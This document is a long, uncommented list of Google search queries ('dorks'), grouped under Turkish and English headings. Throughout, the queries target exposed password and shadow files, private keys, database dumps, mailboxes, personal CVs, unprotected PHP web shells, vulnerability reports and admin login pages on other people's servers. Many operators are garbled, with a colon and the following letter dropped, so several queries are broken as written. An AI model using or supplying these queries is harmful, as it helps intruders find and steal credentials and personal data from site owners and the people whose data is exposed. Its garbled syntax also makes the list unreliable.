intitle:"Execution of this script not permitted"

intitle:"Under construction" "does not currently have"

intitle:Configuration.File inurl:softcart.exe

MYSQL error message: supplied argument....

mysql error with query

Netscape Application Server Error page

ORA-00921: unexpected end of SQL command

ORA-00921: unexpected end of SQL command

ORA-00936: missing expression

PHP application warnings failing "include_path"

sitebuildercontent

sitebuilderfiles

sitebuilderpictures

Snitz! forums db path error

SQL syntax error

Supplied argument is not a valid PostgreSQL result

warning "error on line" php sablotron

Windows 2000 web server error messages

ONEMLI DOKUMANLAR

______________________________________

intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu

"#mysql dump" filetype:sql

"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3

"allow_call_time_pass_reference" "PATH_INFO"

"Certificate Practice Statement" inurlPDF | DOC)

"Generated by phpSystem"

"generated by wwwstat"

"Host Vulnerability Summary Report"

"HTTP_FROM=googlebot" googlebot.com "Server_Software="

"Index of" / "chat/logs"

"Installed Objects Scanner" inurl:default.asp

"MacHTTP" filetype:log inurl:machttp.log

"Mecury Version" "Infastructure Group"

"Microsoft Windows * Version * DrWtsn32 Copyright " ext:log

"Most Submitted Forms and Scripts" "this section"

"Network Vulnerability Assessment Report"

"not for distribution" confidential

"not for public release" -.edu -.gov -.mil

"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"

"phpMyAdmin" "running on" inurl:"main.php"

"produced by getstats"

"Request Details" "Control Tree" "Server Variables"

"robots.txt" "Disallow:" filetype:txt

"Running in Child mode"

"sets mode: +p"

"sets mode: +s"

"Thank you for your order" +receipt

"This is a Shareaza Node"

"This report was generated by WebLog"

( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intextassword|subject

(intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results")

(intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob

(inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt

+":8080" +":3128" +":80" filetype:txt

+"HSTSNR" -"netop.com"

 -sitehp.net -"The PHP Group" inurl:source inurl:url extHp

94FBR "ADOBE PHOTOSHOP"

AIM buddy lists

allinurl:/examples/jsp/snp/snoop.jsp

allinurl:cdkey.txt

allinurl:servlet/SnoopServlet

cgiirc.conf

cgiirc.conf

contacts ext:wml

data filetype:mdb -site:gov -site:mil

exported email addresses

extdoc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential

ext:asp inurlathto.asp

ext:ccm ccm -catacomb

ext:CDX CDX

ext:cgi inurl:editcgi.cgi inurl:file=

ext:conf inurl:rsyncd.conf -cvs -man

ext:conf NoCatAuth -cvs

ext:dat bpk.dat

extBF DBF

extCA DCA

ext:gho gho

ext:ics ics

ext:ini intext:env.ini

ext:jbf jbf

ext:ldif ldif

ext:log "Software: Microsoft Internet Information Services *.*"

ext:mdb inurl:*.mdb inurl:fpdb shop.mdb

ext:nsf nsf -gov -mil

extlist filetypelist inurl:bookmarks.plist

extqi pqi -database

ext:reg "username=*" putty

ext:txt "Final encryption key"

ext:txt inurl:dxdiag

ext:vmdk vmdk

ext:vmx vmx

filetype:asp DBQ=" * Server.MapPath("*.mdb")

filetype:bkf bkf

filetype:blt "buddylist"

filetype:blt blt +intext:screenname

filetype:cfg auto_inst.cfg

filetype:cnf inurl:_vti_pvt access.cnf

filetype:conf inurl:firewall -intitle:cvs

filetype:config web.config -CVS

filetype:ctt Contact

filetype:ctt ctt messenger

filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"

filetype:fp3 fp3

filetype:fp5 fp5 -site:gov -site:mil -"cvs log"

filetype:fp7 fp7

filetype:inf inurl:capolicy.inf

filetype:lic lic intext:key

filetype:log access.log -CVS

filetype:log cron.log

filetype:mbx mbx intext:Subject

filetype:myd myd -CVS

filetype:ns1 ns1

filetypera ora

filetypera tnsnames

filetypedb pdb backup (Pilot | Pluckerdb)

filetypehp inurl:index inurlhpicalendar -site:sourceforge.net

filetypeot inurl:john.pot

filetype:PS ps

filetypest inurl:"outlook.pst"

filetypest pst -from -to -date

filetypebb qbb

filetype:QBW qbw

filetype:rdp rdp

filetype:reg "Terminal Server Client"

filetype:vcs vcs

filetype:wab wab

filetype:xls -site:gov inurl:contact

filetype:xls inurl:"email.xls"

Financial spreadsheets: finance.xls

Financial spreadsheets: finances.xls

Ganglia Cluster Reports

haccess.ctl (one way)

haccess.ctl (VERY reliable)

ICQ chat logs, please...

intext:"Session Start * * * *:*:* *" filetype:log

intext:"Tobias Oetiker" "traffic analysis"

intextpassword | passcode) intextusername | userid | user) filetype:csv

intext:gmail invite intext:http://gmail.google.com/gmail/a

intext:SQLiteManager inurl:main.php

intext:ViewCVS inurl:Settings.php

intitle:"admin panel" +"Powered by RedKernel"

intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)

intitle:"AppServ Open Project" -site:www.appservnetwork.com

intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"

intitle:"Big Sister" +"OK Attention Trouble"

intitle:"curriculum vitae" filetype:doc

intitle:"edna:streaming mp3 server" -forums

intitle:"FTP root at"

intitle:"index of" +myd size

intitle:"Index Of" -inurl:maillog maillog size

intitle:"Index Of" cookies.txt size

intitle:"index of" mysql.conf OR mysql_config

intitle:"Index of" upload size parent directory

intitle:"index.of *" admin news.asp configview.asp

intitle:"index.of" .diz .nfo last modified

intitle:"Joomla - Web Installer"

intitle:"LOGREP - Log file reporting system" -site:itefix.no

intitle:"Multimon UPS status page"

intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )

intitle:"PhpMyExplorer" inurl:"index.php" -cvs

intitle:"statistics of" "advanced web statistics"

intitle:"System Statistics" +"System and Network Information Center"

intitle:"urchin (5|3|admin)" ext:cgi

intitle:"Usage Statistics for" "Generated by Webalizer"

intitle:"wbem" compaq login "Compaq Information Technologies Group"

intitle:"Web Server Statistics for ****"

intitle:"web server status" SSH Telnet

intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"

intitle:"welcome.to.squeezebox"

intitle:admin intitle:login

intitle:Bookmarks inurl:bookmarks.html "Bookmarks

intitle:index.of "Apache" "server at"

intitle:index.of cleanup.log

intitle:index.of dead.letter

intitle:index.of inbox

intitle:index.of inbox dbx

intitle:index.of ws_ftp.ini

intitle:intranet inurl:intranet +intext:"phone"

inurl:"/axs/ax-admin.pl" -script

inurl:"/cricket/grapher.cgi"

inurl:"bookmark.htm"

inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM

inurl:"newsletter/admin/"

inurl:"newsletter/admin/" intitle:"newsletter admin"

inurl:"putty.reg"

inurl:"smb.conf" intext:"workgroup" filetype:conf conf

inurl:*db filetype:mdb

inurl:/cgi-bin/pass.txt

inurl:/_layouts/settings

inurl:admin filetype:xls

inurl:admin intitle:login

inurl:backup filetype:mdb

inurl:build.err

inurl:cgi-bin/printenv

inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"

inurl:changepassword.asp

inurl:ds.py

inurl:email filetype:mdb

inurl:fcgi-bin/echo

inurl:forum filetype:mdb

inurl:forward filetype:forward -cvs

inurl:getmsg.html intitle:hotmail

inurl:log.nsf -gov

inurl:main.php phpMyAdmin

inurl:main.php Welcome to phpMyAdmin

inurl:netscape.hst

inurl:netscape.hst

inurl:netscape.ini

inurl:odbc.ini ext:ini -cvs

inurlerl/printenv

inurlhp.ini filetype:ini

inurlreferences.ini "[emule]”

inurlrofiles filetype:mdb

inurl:report “EVEREST Home Edition ”

inurl:server-info “Apache Server Information”

inurl:server-status “apache”

inurl:snitz_forums_2000.mdb

inurl:ssl.conf filetype:conf

inurl:tdbin

inurl:vbstats.php “page generated”

inurl:wp-mail.php + “There doesn’t seem to be any new mail.”

inurl:XcCDONTS.asp

ipsec.conf

ipsec.secrets

ipsec.secrets

Lotus Domino address books

mail filetype:csv -site:gov intext:name

Microsoft Money Data Files

mt-db-pass.cgi files

MySQL tabledata dumps

mystuff.xml - Trillian data files

OWA Public Folders (direct view)

Peoples MSN contact lists

php-addressbook “This is the addressbook for *” -warning

phpinfo()

phpMyAdmin dumps

phpMyAdmin dumps

private key files (.csr)

private key files (.key)

Quicken data files

rdbqds -site:.edu -site:.mil -site:.gov

robots.txt

site:edu admin grades

site:www.mailinator.com inurl:ShowMail.do

SQL data dumps

Squid cache server reports

Unreal IRCd

WebLog Referrers

Welcome to ntop!

Passwords

__________________________

“admin account info” filetype:log

!Host=*.* intext:enc_UserPassword=* extcf

“# -FrontPage-” extwd inurlservice | authors | administrators | users) “# -FrontPage-” inurl:service.pwd

“AutoCreate=TRUE password=*”

“http://*:*@www” domainname

“index of/” “ws_ftp.ini” “parent directory”

“liveice configuration file” ext:cfg -site:sourceforge.net

“parent directory” +proftpdpasswd

“powered by ducalendar” -site:duware.com

“Powered by Duclassified” -site:duware.com

“Powered by Duclassified” -site:duware.com “DUware All Rights reserved”

“powered by duclassmate” -site:duware.com

“Powered by Dudirectory” -site:duware.com

“powered by dudownload” -site:duware.com

“Powered By Elite Forum Version *.*”

“Powered by Link Department”

“sets mode: +k”

“your password is” filetype:log

“Powered by DUpaypal” -site:duware.com

allinurl: admin mdb

auth_user_file.txt

config.php

eggdrop filetype:user user

enable password | secret “current configuration” -intext:the

etc (index.of)

ext:asa | ext:bak intext:uid intextwd -”uid..pwd” database | server | dsn

ext:inc “pwd=” “UID=”

ext:ini eudora.ini

ext:ini Version=4.0.0.4 password

extasswd -intext:the -sample -example

ext:txt inurl:unattend.txt

ext:yml database inurl:config

filetype:bak createobject sa

filetype:bak inurl:”htaccess|passwd|shadow|htusers”

filetype:cfg mrtg “target[*]” -sample -cvs -example

filetype:cfm “cfapplication name” password

filetype:conf oekakibbs

filetype:conf slapd.conf

filetype:config config intext:appSettings “User ID”

filetype:dat “password.dat”

filetype:dat inurl:Sites.dat

filetype:dat wand.dat

filetype:inc dbconn

filetype:inc intext:mysql_connect

filetype:inc mysql_connect OR mysql_pconnect

filetype:inf sysprep

filetype:ini inurl:”serv-u.ini”

filetype:ini inurl:flashFXP.ini

filetype:ini ServUDaemon

filetype:ini wcx_ftp

filetype:ini ws_ftp pwd

filetype:ldb admin

filetype:log “See `ipsec –copyright”

filetype:log inurl:”password.log”

filetype:mdb inurl:users.mdb

filetype:mdb wwforum

filetype:netrc password

filetypeass pass intext:userid

filetypeem intextrivate

filetyperoperties inurl:db intextassword

filetyped service

filetypewl pwl

filetype:reg reg +intext:”defaultusername” +intext:”defaultpassword”

filetype:reg reg +intext:WINVNC3

filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS

filetype:sql “insert into” (pass|passwd|password)

filetype:sql (”values * MD5″ | “values * password” | “values * encrypt”)

filetype:sql (”passwd values” | “password values” | “pass values” )

filetype:sql +”IDENTIFIED BY” -cvs

filetype:sql password

filetype:url +inurl:”ftp://” +inurl:”;@”

filetype:xls username password email

htpasswd

htpasswd / htgroup

htpasswd / htpasswd.bak

intext:”enable password 7″

intext:”enable secret 5 $”

intext:”powered by EZGuestbook”

intext:”powered by Web Wiz Journal”

intitle:”index of” intext:connect.inc

intitle:”index of” intext:globals.inc

intitle:”Index of” passwords modified

intitle:”Index of” sc_serv.conf sc_serv content

intitle:”phpinfo()” +”mysql.default_password” +”Zend Scripting Language Engine”

intitle:dupics inurladd.asp | default.asp | view.asp | voting.asp) -site:duware.com

intitle:index.of administrators.pwd

intitle:Index.of etc shadow

intitle:index.of intext:”secring.skr”|”secring.pgp”|”secring.bak”

intitle:rapidshare intext:login

inurl:”calendarscript/users.txt”

inurl:”editor/list.asp” | inurl:”database_editor.asp” | inurl:”login.asa” “are set”

inurl:”GRC.DAT” intext:”password”

inurl:”Sites.dat”+”PASS=”

inurl:”slapd.conf” intext:”credentials” -manpage -”Manual Page” -man: -sample

inurl:”slapd.conf” intext:”rootpw” -manpage -”Manual Page” -man: -sample

inurl:”wvdial.conf” intext:”password”

inurl:/db/main.mdb

inurl:/wwwboard

inurl:/yabb/Members/Admin.dat

inurl:ccbill filetype:log

inurl:cgi-bin inurl:calendar.cfg

inurl:chap-secrets -cvs

inurl:config.php dbuname dbpass

inurl:filezilla.xml -cvs

inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man

inurl:nuke filetype:sql

inurlspfd.conf intextassword -sample -test -tutorial -download

inurlap-secrets -cvs

inurlass.dat

inurlerform filetype:ini

inurlerform.ini filetype:ini

inurl:secring ext:skr | extgp | ext:bak

inurl:server.cfg rcon password

inurl:ventrilo_srv.ini adminpassword

inurl:vtund.conf intextass -cvs

inurl:zebra.conf intextassword -sample -test -tutorial -download

LeapFTP intitle:”index.of./” sites.ini modified

master.passwd

mysql history files

NickServ registration passwords

passlist

passlist.txt (a better way)

passwd

passwd / etc (reliable)

people.lst

psyBNC config files

pwd.db

server-dbs “intitle:index of”

signin filetype:url

spwd.db / passwd

trillian.ini

wwwboard WebAdmin inurlasswd.txt wwwboard|webadmin

[WFClient] Password= filetype:ica

DOSYA ISIMLERI

__________________________

“index of” / lck

+intext:”webalizer” +intext:”Total Usernames” +intext:”Usage Statistics for”

bash_history files

filetype:conf inurlroftpd.conf -sample

filetype:log username putty

filetype:reg reg +intext:”internet account manager”

filetype:reg reg HKEY_CURRENT_USER username

index.of perform.ini

intext:”SteamUserPassphrase=” intext:”SteamAppUser=” -”username” -”user”

inurl:admin filetype:asp inurl:userlist

inurl:admin inurl:userlist

inurlhp inurl:hlstats intext:”Server Username”

OWA Public folders & Address book

sh_history files

“adding new user” inurl:addnewuser -”there are no domains”

“index of /” ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )

“Please re-enter your password It must match exactly”

(intitle:”SHOUTcast Administrator”)|(intext:”U SHOUTcast D.N.A.S. Status”)

(intitle:”WordPress Setup Configuration File”)|(inurl:”setup-config.php?step=”)

(inurl:81/cgi-bin/.cobalt/) | (intext:”Welcome to the Cobalt RaQ”)

+htpasswd +WS_FTP.LOG filetype:log

filetypehp HAXPLORER “Server Files Browser”

intitle:”ERROR: The requested URL could not be retrieved” “While trying to retrieve the URL” “The following error was encountered:”

intitle:”net2ftp” “powered by net2ftp” inurl:ftp OR intext:login OR inurl:login

intitle:”Web Data Administrator - Login”

intitle:”YALA: Yet Another LDAP Administrator”

intitle:admin intitle:login

intitle:MyShell 1.1.0 build 20010923

inurl:”phpOracleAdmin/php” -download -cvs

inurl:”tmtrack.dll?”

inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx

inurlolly/CP

PHP Shell (unprotected)

PHPKonsole PHPShell filetypehp -echo

Public PHP FileManagers

intitle:”remote assessment” OpenAanval Console

 -.gov -.mil -.edu -site:merakmailserver.com

“Powered by Midmart Messageboard” “Administrator Login”

“Powered by Monster Top List” MTL numrange:200-

“Powered by UebiMiau” -site:sourceforge.net

“site info for” “Enter Admin Password”

“SquirrelMail version” “By the SquirrelMail Development Team”

“SysCP - login”

“This is a restricted Access Server” “Javascript Not Enabled!”|”Messenger Express” -edu -ac

“This section is for Administrators only. If you are an administrator then please”

“ttawlogin.cgi/?action=”

“VHCS Pro ver” -demo

“VNC Desktop” inurl:5800

“Web-Based Management” “Please input password to login” -inurl:johnny.ihackstuff.com

“WebExplorer Server - Login” “Welcome to WebExplorer Server”

“WebSTAR Mail - Please Log In”

“You have requested access to a restricted area of our website. Please authenticate yourself to continue.”

“You have requested to access the management functions” -.edu

(intitle:”Please login - Forums powered by UBB.threads”)|(inurl:login.php “ubb”)

(intitle:”Please login - Forums powered by WWWThreads”)|(inurl:”wwwthreads/login.php”)|(inurl:”wwwthreads/login.pl?Cat=”)

(intitle:”rymo Login”)|(intext:”Welcome to rymo”) -family

(intitle:”WmSC e-Cart Administration”)|(intitle:”WebMyStyle e-Cart Administration”)

(inurl:”ars/cgi-bin/arweb?O=0″ | inurl:arweb.jsp) -site:remedy.com -site:mil

4images Administration Control Panel

allintitle:”Welcome to the Cyclades”

allinurl:”exchange/logon.asp”

allinurl:wps/portal/ login

ASP.login_aspx “ASP.NET_SessionId”

CGI:IRC Login

ext:cgi intitle:”control panel” “enter your owner password to continue!”

ez Publish administration

filetypehp inurl:”webeditor.php”

filetypel “Download: SuSE Linux Openexchange Server CA”

filetype:r2w r2w

intext:””BiTBOARD v2.0″ BiTSHiFTERS Bulletin Board”

intext:”Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed.” -edu

intext:”Mail admins login here to administrate your domain.”

intext:”Master Account” “Domain Name” “Password” inurl:/cgi-bin/qmailadmin

intext:”Master Account” “Domain Name” “Password” inurl:/cgi-bin/qmailadmin

intext:”Storage Management Server for” intitle:”Server Administration”

intext:”Welcome to” inurl:”cp” intitle:”H-SPHERE” inurl:”begin.html” -Fee

intext:”vbulletin” inurl:admincp

intitle:”*- HP WBEM Login” | “You are being prompted to provide login account information for *” | “Please provide the information requested and press

intitle:”Admin Login” “admin login” “blogware”

intitle:”Admin login” “Web Site Administration” “Copyright”

intitle:”AlternC Desktop”

intitle:”Athens Authentication Point”

intitle:”b2evo > Login form” “Login form. You must log in! You will have to accept cookies in order to log in” -demo -site:b2evolution.net

intitle:”Cisco CallManager User Options Log On” “Please enter your User ID and Password in the spaces provided below and click the Log On button to co

intitle:”ColdFusion Administrator Login”

intitle:”communigate pro * *” intitle:”entrance”

intitle:”Content Management System” “user name”|”password”|”admin” “Microsoft IE 5.5″ -mambo

intitle:”Content Management System” “user name”|”password”|”admin” “Microsoft IE 5.5″ -mambo

intitle:”Dell Remote Access Controller”

intitle:”Docutek ERes - Admin Login” -edu

intitle:”Employee Intranet Login”

intitle:”eMule *” intitle:”- Web Control Panel” intext:”Web Control Panel” “Enter your password here.”

intitle:”ePowerSwitch Login”

intitle:”eXist Database Administration” -demo

intitle:”EXTRANET * - Identification”

intitle:”EXTRANET login” -.edu -.mil -.gov

intitle:”EZPartner” -netpond

intitle:”Flash Operator Panel” -exthp -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists

intitle:”i-secure v1.1″ -edu

intitle:”Icecast Administration Admin Page”

intitle:”iDevAffiliate - admin” -demo

intitle:”ISPMan : Unauthorized Access prohibited”

intitle:”ITS System Information” “Please log on to the SAP System”

intitle:”Kurant Corporation StoreSense” filetype:bok

intitle:”ListMail Login” admin -demo

intitle:”Login - powered by Easy File Sharing Web Server”

intitle:”Login Forum Powered By AnyBoard” intitle:”If you are a new user:” intext:”Forum Powered By AnyBoard” inurl:gochat -edu

intitle:”Login to @Mail” (extl | inurl:”index”) -dwaffleman

intitle:”Login to Cacti”

intitle:”Login to the forums - @www.aimoo.com” inurl:login.cfm?id=

intitle:”MailMan Login”

intitle:”Member Login” “NOTE: Your browser must have cookies enabled in order to log into the site.” exthp OR ext:cgi

intitle:”Merak Mail Server Web Administration” -ihackstuff.com

intitle:”microsoft certificate services” inurl:certsrv

intitle:”MikroTik RouterOS Managing Webpage”

intitle:”MX Control Console” “If you can’t remember”

intitle:”Novell Web Services” “GroupWise” -inurl:”doc/11924″ -.mil -.edu -.gov -filetypedf

intitle:”Novell Web Services” intext:”Select a service and a language.”

intitle:”oMail-admin Administration - Login” -inurlmnis.ch

intitle:”OnLine Recruitment Program - Login”

intitle:”Philex 0.2*” -script -site:freelists.org

intitle:”PHP Advanced Transfer” inurl:”login.php”

intitle:”php icalendar administration” -site:sourceforge.net

intitle:”php icalendar administration” -site:sourceforge.net

intitle:”phpPgAdmin - Login” Language

intitle:”PHProjekt - login” login password

intitle:”please login” “your password is *”

intitle:”Remote Desktop Web Connection” inurl:tsweb

intitle:”SFXAdmin - sfx_global” | intitle:”SFXAdmin - sfx_local” | intitle:”SFXAdmin - sfx_test”

intitle:”SHOUTcast Administrator” inurl:admin.cgi

intitle:”site administration: please log in” “site designed by emarketsouth”

intitle:”Supero Doctor III” -inurl:supermicro

intitle:”SuSE Linux Openexchange Server” “Please activate JavaScript!”

intitle:”teamspeak server-administration

intitle:”Tomcat Server Administration”

intitle:”TOPdesk ApplicationServer”

intitle:”TUTOS Login”

intitle:”TWIG Login”

intitle:”vhost” intext:”vHost . 2000-2004″

intitle:”Virtual Server Administration System”

intitle:”VisNetic WebMail” inurl:”/mail/”

intitle:”VitalQIP IP Management System”

intitle:”VMware Management Interface:” inurl:”vmware/en/”

intitle:”VNC viewer for Java”

intitle:”web-cyradm”|”by Luc de Louw” “This is only for authorized users” -tar.gz -site:web-cyradm.org

intitle:”WebLogic Server” intitle:”Console Login” inurl:console

intitle:”Welcome Site/User Administrator” “Please select the language” -demos

intitle:”Welcome to Mailtraq WebMail”

intitle:”welcome to netware *” -site:novell.com

intitle:”WorldClient” intext:” (2003|2004) Alt-N Technologies.”

intitle:”xams 0.0.0..15 - Login”

intitle:”XcAuctionLite” | “DRIVEN BY XCENT” Lite inurl:admin

intitle:”XMail Web Administration Interface” intext:Login intextassword

intitle:”Zope Help System” inurl:HelpSys

intitle:”ZyXEL Prestige Router” “Enter password”

intitle:”inc. vpn 3000 concentrator”

intitle”TrackerCam Live Video”)|(”TrackerCam Application Login”)|(”Trackercam Remote”) -trackercam.com

intitle:asterisk.management.portal web-access

intitle:endymion.sak.mail.login.page | inurl:sake.servlet

intitle:Group-Office “Enter your username and password to login”

intitle:ilohamail “Powered by IlohaMail”

intitle:ilohamail intext:”Version 0.8.10″ “Powered by IlohaMail”

intitle:IMP inurl:imp/index.php3

intitle:Login * Webmailer

intitle:Login intext:”RT is Copyright”

intitle:Node.List Win32.Version.3.11

intitle:Novell intitle:WebAccess “Copyright *-* Novell, Inc”

intitlepen-xchange inurl:login.pl

intitle:Ovislink inurlrivate/login

intitlehpnews.login

intitlelesk inurl:login.php3

inurl:”/admin/configuration. php?” Mystore

inurl:”/slxweb.dll/external?name=(custportal|webticketcust)”

inurl:”1220/parse_xml.cgi?”

inurl:”631/admin” (inurl:”op=*”) | (intitle:CUPS)

inurl:”:10000″ intext:webmin

inurl:”Activex/default.htm” “Demo”

inurl:”calendar.asp?action=login”

inurl:”default/login.php” intitle:”kerio”

inurl:”gs/adminlogin.aspx”

inurl:”php121login.php”

inurl:”suse/login.pl”

inurl:”typo3/index.php?u=” -demo

inurl:”usysinfo?login=true”

inurl:”utilities/TreeView.asp”

inurl:”vsadmin/login” | inurl:”vsadmin/admin” inurl:.php|.asp -”Response.Buffer = True” -javascript

inurl:”webadmin” filetype:nsf

inurl:/admin/login.asp

inurl:/cgi-bin/sqwebmail?noframes=1

inurl:/Citrix/Nfuse17/

inurl:/dana-na/auth/welcome.html

inurl:/eprise/

inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:”Miva Merchant Administration Login” -inurl:cheap-malboro.net

inurl:/modcp/ intext:Moderator+vBulletin

inurl:/SUSAdmin intitle:”Microsoft Software Update Services”

inurl:/webedit.* intext:WebEdit Professional -html

inurl:1810 “Oracle Enterprise Manager”

inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com

inurl::2082/frontend -demo

inurl:administrator “welcome to mambo”

inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0

inurl:cgi-bin/ultimatebb.cgi?ubb=login

inurl:Citrix/****Frame/default/default.aspx

inurl:confixx inurl:login|anmeldung

inurl:coranto.cgi intitle:Login (Authorized Users Only)

inurl:csCreatePro.cgi

inurl:default.asp intitle:”WebCommander”

inurl:exchweb/bin/auth/owalogon.asp

inurl:gnatsweb.pl

inurl:ids5web

inurl:irc filetype:cgi cgi:irc

inurl:login filetype:swf swf

inurl:login.asp

inurl:login.cfm

inurl:login.php “SquirrelMail version”

inurl:****framexp/default/login.asp | intitle:”****frame XP Login”

inurl:mewebmail

inurl:names.nsf?opendatabase

inurlcw_login_username

inurlrasso.wwsso_app_admin.ls_login

inurlostfixadmin intitle:”postfix admin” exthp

inurl:search/admin.php

inurl:textpattern/index.php

inurl:WCP_USER

inurl:webmail./index.pl “Interface”

inurl:webvpn.html “login” “Please enter your”

Login (”Powered by Jetbox One CMS ” | “Powered by Jetstream *”)

Novell NetWare intext:”netware management portal version”

Outlook Web Access (a better way)

PhotoPost PHP Upload

PHPhotoalbum Statistics

PHPhotoalbum Upload

phpWebMail

Please enter a valid password! inurlolladmin

Powered by INDEXU

Ultima Online loginservers

W-Nailer Upload Area

Network Data

_____________________________

filetype:log intext:”ConnectionManager2″

“apricot - admin” 00h

“by Reimar Hoven. All Rights Reserved. Disclaimer” | inurl:”log/logdb.dta”

“Network Host Assessment Report” “Internet Scanner”

“Output produced by SysWatch *”

“Phorum Admin” “Database Connection” inurl:forum inurl:admin

“Powered by phpOpenTracker” Statistics

“powered | performed by Beyond Security’s Automated Scanning” -kazaa -example

“Shadow Security Scanner performed a vulnerability assessment”

“SnortSnarf alert page”

“The following report contains confidential information” vulnerability -search

“The statistics were last updated” “Daily”-microsoft.com

“this proxy is working fine!” “enter *” “URL***” * visit

“This report lists” “identified by Internet Scanner”

“Traffic Analysis for” “RMON Port * on unit *”

“Version Info” “Boot Version” “Internet Settings”

((inurl:ifgraph “Page generated at”) OR (”This page was built using ifgraph”))

Analysis Console for Incident Databases

ext:cfg radius.cfg

ext:cgi intext:”nrg-” ” This web page was created on ”

filetypedf “Assessment Report” nessus

filetypehp inurl:ipinfo.php “Distributed Intrusion Detection System”

filetypehp inurl:nqt intext:”Network Query Tool”

filetype:vsd vsd network -samples -examples

intext:”Welcome to the Web V.Networks” intitle:”V.Networks [Top]” -filetype:htm

intitle:”ADSL Configuration page”

intitle:”Azureus : Java BitTorrent Client Tracker”

intitle:”Belarc Advisor Current Profile” intext:”Click here for Belarc’s PC Management products, for large and small companies.”

intitle:”BNBT Tracker Info”

intitle:”Microsoft Site Server Analysis”

intitle:”Nessus Scan Report” “This file was generated by Nessus”

intitle:”PHPBTTracker Statistics” | intitle:”PHPBT Tracker Statistics”

intitle:”Retina Report” “CONFIDENTIAL INFORMATION”

intitle:”start.managing.the.device” remote pbx acc

intitle:”sysinfo * ” intext:”Generated by Sysinfo * written by The Gamblers.”

intitle:”twiki” inurl:”TWikiUsers”

inurl:”/catalog.nsf” intitle:catalog

inurl:”install/install.php”

inurl:”map.asp?” intitle:”WhatsUp Gold”

inurl:”NmConsole/Login.asp” | intitle:”Login - Ipswitch WhatsUp Professional 2005″ | intext:”Ipswitch WhatsUp Professional 2005 (SP1)” “Ipswitch, Inc”

inurl:”sitescope.html” intitle:”sitescope” intext:”*******” -demo

inurl:/adm-cfgedit.php

inurl:/cgi-bin/finger? “In real life”

inurl:/cgi-bin/finger? Enter (account|host|user|username)

inurl:/counter/index.php intitle:”+PHPCounter 7.*”

inurl:CrazyWWWBoard.cgi intext:”detailed debugging information”

inurl:login.jsp.bak

inurlvcgi/jovw

inurlhpSysInfo/ “created by phpsysinfo”

inurlortscan.php “from Port”|”Port Range”

inurlroxy | inurl:wpad extac | ext:dat findproxyforurl

inurl:statrep.nsf -gov

inurl:status.cgi?host=all

inurl:testcgi xitami

inurl:webalizer filetypeng -.gov -.edu -.mil -opendarwin

inurl:webutil.pl

Looking Glass

site:netcraft.com intitle:That.Site.Running Apache

INDEX OF

_____________________

“Directory Listing for” “Hosted by Xerver”

“Index Of /network” “last modified”

“index of cgi-bin”

“index of” / picasa.ini

“index of” inurl:recycler

“Index of” rar r01 nfo Modified 2004

“intitle:Index.Of /” stats merchant cgi-* etc

“Powered by Invision Power File Manager” (inurl:login.php) | (intitle:”Browsing directory /” )

“Warning: Installation directory exists at” “Powered by Zen Cart” -demo

“Web File Browser” “Use regular expression”

“Welcome to phpMyAdmin” ” Create new database”

“Welcome to the directory listing of” “NetworkActiv-Web-Server”

allintitle:”FirstClass Login”

allinurl:”/*/_vti_pvt/” | allinurl:”/*/_vti_cnf/”

filetype:cfg ks intext:rootpw -sample -test -howto

filetype:ini Desktop.ini intext:mydocs.dll

filetype:torrent torrent

Index of phpMyAdmin

index.of.dcim

index.of.password

index.of.password

intext:”d.aspx?id” || inurl:”d.aspx?id”

intext:”Powered By: TotalIndex” intitle:”TotalIndex”

intitle:”album permissions” “Users who can modify photos” “EVERYBODY”

intitle:”Backup-Management (phpMyBackup v.0.4 beta * )”

intitle:”Directory Listing For” intext:Tomcat -intitle:Tomcat

intitle:”Folder Listing” “Folder Listing” Name Size Date/Time File Folder

intitle:”HFS /” +”HttpFileServer”

intitle:”Index of *” inurl:”my shared folder” size modified

intitle:”Index of /CFIDE/” administrator

intitle:”Index of c:\Windows”

intitle:”index of” “parent directory” “desktop.ini” site:dyndns.org

intitle:”index of” -inurl:htm -inurl:html mp3

intitle:”Index of” cfide

intitle:”index of” intext:”content.ie5″

intitle:”index of” inurl:ftp (pub | incoming)

intitle:”index.of.personal”

intitle:”pictures thumbnails” siteictures.sprintpcs.com

intitle:”webadmin - /*” filetypehp directory filename permission

intitle:index.of (inurl:fileadmin | intitle:fileadmin)

intitle:index.of /AlbumArt_

intitle:index.of /maildir/new/

intitle:index.of abyss.conf

intitle:index.of WEB-INF

intitle:intranet inurl:intranet +intext:”human resources”

intitle:upload inurl:upload intext:upload -forum -shop -support -w3c

inurl:/pls/sample/admin_/help/

inurl:/tmp

inurl:backup intitle:index.of inurl:admin

inurl:explorer.cfm inurldirpath|This_Directory)

inurl:install.pl intext:”Reading path paramaters” -edu

inurl:j2ee/examples/jsp

inurljspdemos

log inurl:linklint filetype:txt -”checking”

Look in my backup directories! Please?

private

protected

secret

secure

winnt

“More Info about ****Cart Free”

Comersus.mdb database

intext:”powered by Hosting Controller” intitle:Hosting.Controller

intext:”Powered by X-Cart: shopping cart software” -site:x-cart.com

